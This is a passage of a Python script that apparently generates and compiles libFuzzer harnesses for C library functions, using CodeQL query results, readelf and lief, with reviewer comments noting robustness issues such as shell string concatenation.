# ---------------------------------------------------------------------------
# Mode 0: generate and compile harnesses for single-argument target functions.
# ---------------------------------------------------------------------------
if (int(args.mode) == 0):
    shared_objects=[]  # binaries found in the library directory
    object_functions={"output":[],"object":[]}  # readelf dump keyed by binary
    total_functions={"function":[], "type":[],"type_or_loc":[]}  # all CodeQL rows
    defined_functions={"function":[], "type":[],"object": [],"type_or_loc":[]}
    shared_functions={"function":[], "type":[],"object": [],"type_or_loc":[]}
    cwd = os.getcwd()
    # Copy the single-argument CodeQL query next to the codeql checkout, run it
    # against the database, and decode the result to <output>/onearg.csv.
    # NOTE(review): commands are assembled by string concatenation and executed
    # with shell=True; paths containing spaces or shell metacharacters break,
    # and args.ql must end with a separator for "<ql>codeql" to resolve.
    if int(args.detection) == 0:
        subprocess.check_output("cp " + cwd + "/onearglocation.ql " + args.ql, shell=True)
        subprocess.check_output("cd "+ args.ql + ";" +args.ql+ "codeql query run onearglocation.ql -o " + args.output + "onearg.bqrs -d " + args.ql + args.database +";" + args.ql + "codeql bqrs decode --format=csv " + args.output + "onearg.bqrs -o " + args.output + "onearg.csv", shell=True)
    elif int(args.detection) == 1:
        subprocess.check_output("cp " + cwd + "/oneargfunc.ql " + args.ql, shell=True)
        subprocess.check_output("cd "+ args.ql + ";" +args.ql+ "codeql query run oneargfunc.ql -o " + args.output + "onearg.bqrs -d " + args.ql + args.database +";" + args.ql + "codeql bqrs decode --format=csv " + args.output + "onearg.bqrs -o " + args.output + "onearg.csv", shell=True)
    os.chdir(args.library)
    # Scan the library directory for shared objects / PIE executables, judged
    # from the output of file(1).
    matches = ["shared object","pie executable"]
    for filename in os.listdir(args.library):
        if any(x in subprocess.run(["file", filename], stdout=subprocess.PIPE).stdout.decode('utf-8') for x in matches):
            print("Found shared object " + filename)
            shared_objects.append(filename)
    # Keep the full readelf dump of every candidate binary so function names
    # can be substring-matched against it below.
    for obj in shared_objects:
        object_functions["output"].append(subprocess.run(["readelf", "-a",obj], stdout=subprocess.PIPE).stdout.decode('utf-8'))
        object_functions["object"].append(obj)
    # CSV columns from the query: f = function name, t = parameter type,
    # g = header location (detection 0) or return type (detection 1) -- judged
    # from how the values are used when the harness source is emitted below.
    data = pd.read_csv(args.output + "onearg.csv")
    total_functions["function"] = list(data.f)
    total_functions["type"] = list(data.t)
    total_functions["type_or_loc"] = list(data.g)
    # Keep only functions whose name appears somewhere in a binary's readelf
    # output.  NOTE(review): plain substring matching -- short function names
    # can false-match unrelated symbols or text.
    for index, define in enumerate(object_functions["output"]):
        for index2, cur in enumerate(total_functions["function"]):
            if (str(cur) in define):
                defined_functions["function"].append(cur)
                defined_functions["type"].append(total_functions["type"][index2])
                defined_functions["object"].append(object_functions["object"][index])
                defined_functions["type_or_loc"].append(total_functions["type_or_loc"][index2])
    # For functions found in a non-".so" binary (i.e. a PIE executable), use
    # lief to export the function and drop the PIE flag, writing a linkable
    # lib<function>.so.  Functions already in a .so are passed through as-is.
    for i in range(len(defined_functions["function"])):
        if ".so" not in str(defined_functions["object"][i]):
            elf = lief.parse(args.library + str(defined_functions["object"][i]))
            try:
                addr = elf.get_function_address(str(defined_functions["function"][i]))
            except:
                # Address not resolvable for this symbol: skip the function.
                # NOTE(review): bare except also hides unrelated lief errors.
                continue
            elf.add_exported_function(addr, str(defined_functions["function"][i]))
            elf[lief.ELF.DYNAMIC_TAGS.FLAGS_1].remove(lief.ELF.DYNAMIC_FLAGS_1.PIE)
            outfile = "lib%s.so" % str(defined_functions["function"][i])
            elf.write(outfile)
            shared_functions["function"].append(str(defined_functions["function"][i]))
            shared_functions["type"].append(str(defined_functions["type"][i]))
            shared_functions["object"].append(outfile)
            shared_functions["type_or_loc"].append(str(defined_functions["type_or_loc"][i]))
        else:
            shared_functions["function"].append(str(defined_functions["function"][i]))
            shared_functions["type"].append(str(defined_functions["type"][i]))
            shared_functions["object"].append(str(defined_functions["object"][i]))
            shared_functions["type_or_loc"].append(str(defined_functions["type_or_loc"][i]))
    # Emit one C harness per surviving function and compile it with
    # clang + libFuzzer/ASan/UBSan, linking against the shared object.
    for index3 in range(len(shared_functions["function"])):
        header_section = ""
        if not args.headers:
            if int(args.detection) == 0:
                # detection 0: type_or_loc carries the header path.
                header_section = "#include \"" + os.path.basename(shared_functions["type_or_loc"][index3]) + "\"\n\n"
            else:
                header_section = ""
        else:
            header_list = args.headers.split(",")
            for x in header_list:
                header_section+= "#include \"" + x + "\"\n\n"
        if int(args.detection) == 0:
            main_section = "int LLVMFuzzerTestOneInput(" + str(shared_functions["type"][index3]) + " Data, long Size) {\n\t" + str(shared_functions["function"][index3]) + "(Data);\n\treturn 0;\n}"
        else:
            # detection 1: type_or_loc carries the return type, so a forward
            # declaration of the target precedes the fuzzer entry point.
            main_section = str(shared_functions["type_or_loc"][index3]) + " " + str(shared_functions["function"][index3]) + "(" + str(shared_functions["type"][index3])+ " testcase);\n" + "int LLVMFuzzerTestOneInput(" + str(shared_functions["type"][index3]) + " Data, long Size) {\n\t" + str(shared_functions["function"][index3]) + "(Data);\n\treturn 0;\n}"
        full_source = header_section + main_section
        # Sanitize the function name into a file name (alnum and spaces only).
        filename = "".join([c for c in str(shared_functions["function"][index3]) if c.isalpha() or c.isdigit() or c==' ']).rstrip()
        # NOTE(review): the handle is never closed/flushed before clang is
        # spawned below; the write is only guaranteed at interpreter exit.
        f = open(args.output + filename +".c", "w")
        f.write(full_source)
        # Four compile variants: with/without user flags x debug/quiet output.
        # detection 0 additionally passes -I<header dir> from type_or_loc.
        if int(args.detection) == 0:
            if args.flags is not None and int(args.debug) == 1:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
            elif args.flags is not None and int(args.debug) == 0:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
            elif args.flags is None and int(args.debug) == 1:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
            else:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
        else:
            if args.flags is not None and int(args.debug) == 1:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
            elif args.flags is not None and int(args.debug) == 0:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
            elif args.flags is None and int(args.debug) == 1:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
            else:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
    # Second pass for detection 1: regenerate each harness to load the target
    # via dlopen()/dlsym() instead of link-time binding, overwriting the .c
    # files written above, and compile without -L/-l options.
    if (int(args.detection) == 1):
        for index4 in range(len(shared_functions["function"])):
            header_section = ""
            if not args.headers:
                header_section = ""
            else:
                header_list = args.headers.split(",")
                for x in header_list:
                    header_section+= "#include \"" + x + "\"\n\n"
            main_section = "#include <stdlib.h>\n#include <dlfcn.h>\n\nvoid* library=NULL;\ntypedef " + str(shared_functions["type_or_loc"][index4]) + "(*" + str(shared_functions["function"][index4]) + "_t)(" + str(shared_functions["type"][index4]) + ");\n" + "void CloseLibrary()\n{\nif(library){\n\tdlclose(library);\n\tlibrary=NULL;\n}\n}\nint LoadLibrary(){\n\tlibrary = dlopen(\"" + args.library + str(shared_functions["object"][index4]) + "\",RTLD_LAZY);\n\tatexit(CloseLibrary);\n\treturn library != NULL;\n}\nint LLVMFuzzerTestOneInput(" + str(shared_functions["type"][index4]) + " Data, long Size) {\n\tLoadLibrary();\n\t" + str(shared_functions["function"][index4]) + "_t " + str(shared_functions["function"][index4]) + "_s = (" + str(shared_functions["function"][index4]) + "_t)dlsym(library,\"" + str(shared_functions["function"][index4]) + "\");\n\t" + str(shared_functions["function"][index4]) + "_s(Data);\n\treturn 0;\n}"
            full_source = header_section + main_section
            filename = "".join([c for c in str(shared_functions["function"][index4]) if c.isalpha() or c.isdigit() or c==' ']).rstrip()
            # NOTE(review): file handle again left open before compiling.
            f = open(args.output + filename +".c", "w")
            f.write(full_source)
            if args.flags is not None and int(args.debug) == 1:
                env = os.environ.copy()
                print("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".c -o " + args.output + filename)
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
            elif args.flags is not None and int(args.debug) == 0:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
            elif args.flags is None and int(args.debug) == 1:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True)
            else:
                env = os.environ.copy()
                subprocess.Popen("clang -g -fsanitize=address,undefined,fuzzer " + args.output + filename +".c -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
# ---------------------------------------------------------------------------
# Mode 1: generate and compile harnesses for multi-argument target functions,
# using FuzzedDataProvider to synthesize each parameter.
# ---------------------------------------------------------------------------
elif (int(args.mode) == 1):
    shared_objects=[]
    func_objects=[]
    object_functions={"output":[],"object":[]}
    cwd = os.getcwd()
    # Run the multi-argument CodeQL query and decode it to multiarg.csv
    # (same shell-concatenation caveats as mode 0).
    if (int(args.detection) == 0):
        subprocess.check_output("cp " + cwd + "/multiarglocation.ql " + args.ql, shell=True)
        subprocess.check_output("cd "+ args.ql + ";" +args.ql+ "codeql query run multiarglocation.ql -o " + args.output + "multiarg.bqrs -d " + args.ql + args.database +";" + args.ql + "codeql bqrs decode --format=csv " + args.output + "multiarg.bqrs -o " + args.output + "multiarg.csv", shell=True)
    elif (int(args.detection) == 1):
        subprocess.check_output("cp " + cwd + "/multiargfunc.ql " + args.ql, shell=True)
        subprocess.check_output("cd "+ args.ql + ";" +args.ql+ "codeql query run multiargfunc.ql -o " + args.output + "multiarg.bqrs -d " + args.ql + args.database +";" + args.ql + "codeql bqrs decode --format=csv " + args.output + "multiarg.bqrs -o " + args.output + "multiarg.csv", shell=True)
    data = pd.read_csv(args.output + "multiarg.csv")
    # One row per (function f, type-or-loc g); the per-parameter types t are
    # aggregated into a Python list for each function.
    total_functions = data.drop_duplicates().groupby(["f", "g"], as_index=False)["t"].agg(list)
    print(total_functions)
    os.chdir(args.library)
    defined_functions = pd.DataFrame(columns=["f","t","g","object"])
    # As in mode 0: collect candidate binaries and their readelf dumps.
    matches = ["shared object","pie executable"]
    for filename in os.listdir(args.library):
        if any(x in subprocess.run(["file", filename], stdout=subprocess.PIPE).stdout.decode('utf-8') for x in matches):
            print("Found shared object " + filename)
            shared_objects.append(filename)
    for obj in shared_objects:
        object_functions["output"].append(subprocess.run(["readelf", "-a",obj], stdout=subprocess.PIPE).stdout.decode('utf-8'))
        object_functions["object"].append(obj)
    # Substring-match query functions against binaries; func_objects is built
    # in lockstep with the appended rows and assigned as the "object" column.
    for index, defe in enumerate(object_functions["output"]):
        for index2, cur in enumerate(total_functions["f"]):
            if (str(cur) in defe):
                func_objects.append(object_functions["object"][index])
                defined_functions = defined_functions.append([total_functions.iloc[index2,:]])
    defined_functions["object"] = func_objects
    defined_functions = defined_functions.to_dict(orient='list')
    shared_functions={"function":[], "type":[],"object": [],"type_or_loc":[]}
    # As in mode 0: re-export functions from PIE executables via lief,
    # producing lib<function>.so; existing .so objects pass through.
    for i in range(len(defined_functions["f"])):
        if ".so" not in str(defined_functions["object"][i]):
            elf = lief.parse(args.library + str(defined_functions["object"][i]))
            try:
                addr = elf.get_function_address(str(defined_functions["f"][i]))
            except:
                # Address not resolvable; skip (bare except, see mode 0 note).
                continue
            elf.add_exported_function(addr, str(defined_functions["f"][i]))
            elf[lief.ELF.DYNAMIC_TAGS.FLAGS_1].remove(lief.ELF.DYNAMIC_FLAGS_1.PIE)
            outfile = "lib%s.so" % str(defined_functions["f"][i])
            elf.write(outfile)
            shared_functions["function"].append(str(defined_functions["f"][i]))
            shared_functions["type"].append(str(defined_functions["t"][i]))
            shared_functions["object"].append(outfile)
            shared_functions["type_or_loc"].append(str(defined_functions["g"][i]))
        else:
            shared_functions["function"].append(str(defined_functions["f"][i]))
            shared_functions["type"].append(str(defined_functions["t"][i]))
            shared_functions["object"].append(str(defined_functions["object"][i]))
            shared_functions["type_or_loc"].append(str(defined_functions["g"][i]))
    # Emit one C++ harness per function: FuzzedDataProvider produces a value
    # (and pointer wrappers) for each parameter type, then the target is called.
    for index3 in range(len(shared_functions["function"])):
        header_section = ""
        if not args.headers:
            if (int(args.detection) == 0):
                header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n" + "#include \"" + os.path.basename(shared_functions["type_or_loc"][index3]) + "\"\n\n"
            else:
                header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n"
        else:
            header_list = args.headers.split(",")
            header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n"
            for x in header_list:
                header_section+= "#include \"" + x + "\"\n\n"
        # stub: C++ statements creating dataN/pointerN/doublepointerN values;
        # param: argument list for the call; header_args: parameter list for
        # the forward declaration / typedef.
        stub = ""
        marker = 1
        param = ""
        header_args = ""
        # shared_functions["type"] holds the stringified Python list produced
        # by the groupby above; literal_eval turns it back into a list.
        # NOTE(review): in these tests `and` binds tighter than `or`, so the
        # "long double" exclusion only guards the "short" branch -- a
        # "long double" parameter still matches via "long" and is treated as
        # an integral type.  Unrecognized types are silently skipped, which
        # also leaves them out of param/header_args.
        for ty in literal_eval(shared_functions["type"][index3]):
            if ty.count('*') == 1:
                if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
                    param += "pointer" + str(marker) + ", "
                    header_args += ty + "pointer" + str(marker) + ", "
                elif "char" in ty or "string" in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
                    param += "pointer" + str(marker) + ", "
                    header_args += ty + "pointer" + str(marker) + ", "
                elif "float" in ty or "double" in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty.replace("*", "") +">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
                    param += "pointer" + str(marker) + ", "
                    header_args += ty + "pointer" + str(marker) + ", "
                elif "bool" in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n" + ty + "pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
                    param += "pointer" + str(marker) + ", "
                    header_args += ty + "pointer" + str(marker) + ", "
                else:
                    continue
            elif ty.count('*') == 2:
                if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
                    param += "doublepointer" + str(marker) + ", "
                    header_args += ty + "doublepointer" + str(marker) + ", "
                elif "char" in ty or "string" in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
                    param += "doublepointer" + str(marker) + ", "
                    header_args += ty + "doublepointer" + str(marker) + ", "
                elif "float" in ty or "double" in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
                    param += "doublepointer" + str(marker) + ", "
                    header_args += ty + "doublepointer" + str(marker) + ", "
                elif "bool" in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n" + ty.replace("*", "") + "*pointer" + str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
                    param += "doublepointer" + str(marker) + ", "
                    header_args += ty + "doublepointer" + str(marker) + ", "
                else:
                    continue
            else:
                if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty +">();\n"
                    param += "data" + str(marker) + ", "
                    header_args += ty + " data" + str(marker) + ", "
                elif "char" in ty or "string" in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty +">();\n"
                    param += "data" + str(marker) + ", "
                    header_args += ty + " data" + str(marker) + ", "
                elif "float" in ty or "double" in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty +">();\n"
                    param += "data" + str(marker) + ", "
                    header_args += ty + " data" + str(marker) + ", "
                elif "bool" in ty:
                    stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n"
                    param += "data" + str(marker) + ", "
                    header_args += ty + " data" + str(marker) + ", "
                else:
                    continue
            marker+= 1
        # Trim the trailing ", " from the generated argument lists.
        param = rreplace(param,', ','',1)
        header_args = rreplace(header_args,', ','',1)
        if (int(args.detection) == 0):
            main_section = "extern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n\tFuzzedDataProvider provider(data, size);\n\t" + stub + str(shared_functions["function"][index3]) + "(" + param + ");\nreturn 0;\n}"
        else:
            # detection 1: emit a forward declaration built from the return
            # type (type_or_loc) and the generated parameter list.
            main_section = str(shared_functions["type_or_loc"][index3]) + " " + str(shared_functions["function"][index3]) +"(" + header_args + ");\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n\tFuzzedDataProvider provider(data, size);\n\t" + stub + str(shared_functions["function"][index3]) + "(" + param + ");\nreturn 0;\n}"
        full_source = header_section + main_section
        filename = "".join([c for c in str(shared_functions["function"][index3]) if c.isalpha() or c.isdigit() or c==' ']).rstrip()
        # NOTE(review): handle left open before compiling (see mode 0 note).
        f = open(args.output + filename +".cc", "w")
        f.write(full_source)
        # Four compile variants (flags x debug), clang++ this time; detection 0
        # additionally passes -I<header dir> derived from type_or_loc.
        if int(args.detection) == 0:
            if args.flags is not None and int(args.debug) == 1:
                env = os.environ.copy()
                print("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename)
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
            elif args.flags is not None and int(args.debug) == 0:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
            elif args.flags is None and int(args.debug) == 1:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
            else:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -I" + os.path.dirname(shared_functions["type_or_loc"][index3]) + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
        else:
            if args.flags is not None and int(args.debug) == 1:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
            elif args.flags is not None and int(args.debug) == 0:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
            elif args.flags is None and int(args.debug) == 1:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
            else:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer -L " + args.output + " -L " +args.library + " -l:" + str((shared_functions["object"][index3])) + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
    # Second pass for detection 1: regenerate each harness to resolve the
    # target via dlopen()/dlsym() (overwriting the .cc files written above)
    # and compile without -L/-l options.
    if (int(args.detection) == 1):
        for index4 in range(len(shared_functions["function"])):
            header_section = ""
            if not args.headers:
                header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n"
            else:
                header_list = args.headers.split(",")
                header_section += "#include <fuzzer/FuzzedDataProvider.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <string.h>\n"
                for x in header_list:
                    header_section+= "#include \"" + x + "\"\n"
            # Same per-parameter stub generation as the first pass (including
            # the "long double" precedence quirk noted there).
            stub = ""
            marker = 1
            param = ""
            header_args = ""
            for ty in literal_eval(shared_functions["type"][index4]):
                if ty.count('*') == 1:
                    if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
                        param += "pointer" + str(marker) + ", "
                        header_args += ty + "pointer" + str(marker) + ", "
                    elif "char" in ty or "string" in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
                        param += "pointer" + str(marker) + ", "
                        header_args += ty + "pointer" + str(marker) + ", "
                    elif "float" in ty or "double" in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty.replace("*", "") +">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
                        param += "pointer" + str(marker) + ", "
                        header_args += ty + "pointer" + str(marker) + ", "
                    elif "bool" in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n" + ty + "pointer"+ str(marker) + " = &data" + str(marker) + ";\n"
                        param += "pointer" + str(marker) + ", "
                        header_args += ty + "pointer" + str(marker) + ", "
                    else:
                        continue
                elif ty.count('*') == 2:
                    if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
                        param += "doublepointer" + str(marker) + ", "
                        header_args += ty + "doublepointer" + str(marker) + ", "
                    elif "char" in ty or "string" in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
                        param += "doublepointer" + str(marker) + ", "
                        header_args += ty + "doublepointer" + str(marker) + ", "
                    elif "float" in ty or "double" in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty.replace("*", "") + ">();\n" + ty.replace("*", "") + "*pointer"+ str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
                        param += "doublepointer" + str(marker) + ", "
                        header_args += ty + "doublepointer" + str(marker) + ", "
                    elif "bool" in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n" + ty.replace("*", "") + "*pointer" + str(marker) + " = &data" + str(marker) + ";\n" + ty.replace("*", "") + "**doublepointer"+str(marker) + " = &pointer"+ str(marker) + ";\n"
                        param += "doublepointer" + str(marker) + ", "
                        header_args += ty + "doublepointer" + str(marker) + ", "
                    else:
                        continue
                else:
                    if "long" in ty or "int" in ty or "short" in ty and "long double" not in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty +">();\n"
                        param += "data" + str(marker) + ", "
                        header_args += ty + " data" + str(marker) + ", "
                    elif "char" in ty or "string" in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeIntegral<" + ty +">();\n"
                        param += "data" + str(marker) + ", "
                        header_args += ty + " data" + str(marker) + ", "
                    elif "float" in ty or "double" in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeFloatingPoint<" + ty +">();\n"
                        param += "data" + str(marker) + ", "
                        header_args += ty + " data" + str(marker) + ", "
                    elif "bool" in ty:
                        stub += "auto data" + str(marker) + "= provider.ConsumeBool();\n"
                        param += "data" + str(marker) + ", "
                        header_args += ty + " data" + str(marker) + ", "
                    else:
                        continue
                marker+= 1
            param = rreplace(param,', ','',1)
            header_args = rreplace(header_args,', ','',1)
            main_section = "#include <stdlib.h>\n#include <dlfcn.h>\n\nvoid* library=NULL;\ntypedef " + str(shared_functions["type_or_loc"][index4]) + "(*" + str(shared_functions["function"][index4]) + "_t)(" + header_args + ");\nvoid CloseLibrary()\n{\nif(library){\n\tdlclose(library);\n\tlibrary=NULL;\n}\n}\nint LoadLibrary(){\n\tlibrary = dlopen(\"" + args.library + str(shared_functions["object"][index4]) + "\",RTLD_LAZY);\n\tatexit(CloseLibrary);\n\treturn library != NULL;\n}\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {\n\tFuzzedDataProvider provider(data, size);\n\t\n\tLoadLibrary();\n\t" + stub + str(shared_functions["function"][index4]) + "_t " + str(shared_functions["function"][index4]) + "_s = (" + str(shared_functions["function"][index4]) + "_t)dlsym(library,\"" + str(shared_functions["function"][index4]) + "\");\n\t" + str(shared_functions["function"][index4]) + "_s(" + param + ");\n\treturn 0;\n}"
            full_source = header_section + main_section
            filename = "".join([c for c in str(shared_functions["function"][index4]) if c.isalpha() or c.isdigit() or c==' ']).rstrip()
            f = open(args.output + filename +".cc", "w")
            f.write(full_source)
            if args.flags is not None and int(args.debug) == 1:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True)
            elif args.flags is not None and int(args.debug) == 0:
                env = os.environ.copy()
                subprocess.Popen("clang++ -g -fsanitize=address,undefined,fuzzer " + args.flags + " " + args.output + filename +".cc -o " + args.output + filename, env=env, shell=True, stdout=DEVNULL, stderr=STDOUT)
            elif args.flags is None and int(args.debug) == 1:
                env = os.environ.copy()
